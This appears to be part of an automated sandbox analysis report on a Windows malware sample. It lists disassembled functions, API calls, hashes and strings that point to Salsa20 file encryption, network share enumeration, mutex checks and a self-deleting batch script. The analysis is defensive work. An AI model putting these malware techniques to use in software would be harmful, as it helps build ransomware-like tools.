                                                                                                        • Instruction Fuzzy Hash: 793101B1D006019BDB24CF68C8817AEBBE4EF44334F100A2DE426D77C0DB309A84D7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16570 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F165C5
                                                                                                          • Part of subcall function 00F23B4C: _malloc.LIBCMT ref: 00F23B64
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 657562460-0
                                                                                                        • Opcode ID: e25debfb68e8fdd17cb07b3279210a61ced1ac64c40a836a2229ea16d8471647
                                                                                                        • Instruction ID: fcb120b516955a73761f15a8180caaf6b7020272bf6919e5607cd177b1e38348
                                                                                                        • Opcode Fuzzy Hash: e25debfb68e8fdd17cb07b3279210a61ced1ac64c40a836a2229ea16d8471647
                                                                                                        • Instruction Fuzzy Hash: 5221E0B5A00115DBCB14DF68DD81B9ABFA9EB45B10F088229EC09DB348D734EA14DBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12840 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F13C40: _memset.LIBCMT ref: 00F13C83
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000008,-00000400,00000000,00000000,-00000400), ref: 00F128AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2800726579-0
                                                                                                        • Opcode ID: 69a211be2a2e23d8f787e7c4ac723154c5ef2e7462995f4271ec16efb2008df0
                                                                                                        • Instruction ID: b345ebfa5e6c7bdaa5e554a5b541abd6a0f1eb5d61008032cc891864a04415d1
                                                                                                        • Opcode Fuzzy Hash: 69a211be2a2e23d8f787e7c4ac723154c5ef2e7462995f4271ec16efb2008df0
                                                                                                        • Instruction Fuzzy Hash: 5411D371900219ABDB11DF59CC42BDFBBA8EF01724F004129F914A72C0C77999599BD6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FA10 Relevance: 1.5, APIs: 1, Instructions: 19threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001F130,?,00000000,00000000), ref: 00F1FA25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: e1e106c626c922fd3b88bd7c3a13d291c4577561b471b976249a166fe1b7e221
                                                                                                        • Instruction ID: 1f490c94b37b51ac8e3b5fff5eb4f189c9e8fdeefcf15233ea2d1ed999e6cbaf
                                                                                                        • Opcode Fuzzy Hash: e1e106c626c922fd3b88bd7c3a13d291c4577561b471b976249a166fe1b7e221
                                                                                                        • Instruction Fuzzy Hash: 92D05E322483147BE3140A9AAC07F867AC88B15B20F00402AB609DA1C0D5A1E8109698
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F10BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F10C12
                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00F1FDA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1835186980-0
                                                                                                        • Opcode ID: 7576938f71cb12cfaddbdbd04cd985fc6f1787ae10ffefb6a16d999e3a05df59
                                                                                                        • Instruction ID: 42274e6c50438a048e0505df077f815f814582de48795e7361f27a89f5cb7e9f
                                                                                                        • Opcode Fuzzy Hash: 7576938f71cb12cfaddbdbd04cd985fc6f1787ae10ffefb6a16d999e3a05df59
                                                                                                        • Instruction Fuzzy Hash: 4BE02B311043446AD3209764DC02F82BBC49F18724F00C81EF3CAAB9C1C5F1B04897E9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23B43 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F23B64
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        • Opcode ID: 4a9edfa488b106d520550d6d59f9eb2f89314ae1ef82d00d3b70805787632b75
                                                                                                        • Instruction ID: 68f3262a63dbd381fa68d442751da9262dc6a35956f3652f6304c6cf5e030f48
                                                                                                        • Opcode Fuzzy Hash: 4a9edfa488b106d520550d6d59f9eb2f89314ae1ef82d00d3b70805787632b75
                                                                                                        • Instruction Fuzzy Hash: 74D02222E4849996AF32393C68838A97F14C943220B1003D9EC8995453DC054416AA82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,01029230), ref: 00F1FDD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 0da66651f48bdf13e03dbd1fbbb5fb0d4f1fdb95b2aec6c2884a2c7d76e5ca4c
                                                                                                        • Instruction ID: 2284025ab937a8407e6d69990c049c57463eb2aa9205b2fbb8bcaa6cf105e9ad
                                                                                                        • Opcode Fuzzy Hash: 0da66651f48bdf13e03dbd1fbbb5fb0d4f1fdb95b2aec6c2884a2c7d76e5ca4c
                                                                                                        • Instruction Fuzzy Hash: B8D0A93138831937E3100AA7AC03F493A888719B00F000029F208D91C0DAA2E010AA5C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F220B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3646066109-0
                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                        • Instruction ID: 6ffb2004c024f130ea9ac07caf4e6bd973758a54b97b2ff079c4c383cfd98a0a
                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                        • Instruction Fuzzy Hash: 7FB0927244021C77CF012E82EC02A493B19AB60760F048020FB2C181A1E6BBE664A6C9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wfsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 197181222-0
                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction ID: 8590b17707d81167c8cbe2808e4d4973a1cb605879bbc92e7433c18ce3f86bfa
                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction Fuzzy Hash: 7FB0927244020C77CE012A82EC02A493B19AB516A0F008020FB0C18161A67BA6A0AA89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00F382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F382B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F382CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F38568,?,00000000), ref: 00F382E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F38568,?,00000000), ref: 00F38310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: 44a41eaa17246edc641224883b6278e227b5e086cba6c9d83fea3642535d10f2
                                                                                                        • Instruction ID: dd587b920b35929ffe6420cb01833f6eb5c8e1ac2a596b887e6845e98a49ae0f
                                                                                                        • Opcode Fuzzy Hash: 44a41eaa17246edc641224883b6278e227b5e086cba6c9d83fea3642535d10f2
                                                                                                        • Instruction Fuzzy Hash: 2C019232604719ABDB20AE58DC05FDA3798AF04BB1F048015F508DB151EF78DA42E7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F0C090
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F0C095
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 8d3a2d0e99c36641072cf294ddd89f0705eb0ed8dfcd87ed2615ef7f660ac56d
                                                                                                        • Instruction ID: 36e6984eb5a995af8468e9b3091a543b2bef292d4b22c0761be84f19d233dd2a
                                                                                                        • Opcode Fuzzy Hash: 8d3a2d0e99c36641072cf294ddd89f0705eb0ed8dfcd87ed2615ef7f660ac56d
                                                                                                        • Instruction Fuzzy Hash: 77C19E75E003199FCB54CFA9C881ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F124FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F12509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F1251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F12539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F12550
                                                                                                        • GetLastError.KERNEL32 ref: 00F1255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F1256E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 669ffe379c435a86fa4bf43696407c5c6b8ec2649a9a304e7e6f739b78ea2b77
                                                                                                        • Instruction ID: 086070976b961353fce506927634ce1d0f83745e825a0d0b48286ebd7f8be092
                                                                                                        • Opcode Fuzzy Hash: 669ffe379c435a86fa4bf43696407c5c6b8ec2649a9a304e7e6f739b78ea2b77
                                                                                                        • Instruction Fuzzy Hash: 7A71517294021CAADF60EBE1DC89FEA77ACFB44311F040596F609D7090DB799A88DF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 00F11915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F11932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F11956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F11962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F11974
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F1198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01000260), ref: 00F11993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F11999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F119A3
                                                                                                        • _memset.LIBCMT ref: 00F119B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F119DC
                                                                                                          • Part of subcall function 00F12BA0: lstrlenW.KERNEL32(?), ref: 00F12BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F11A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F11A04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
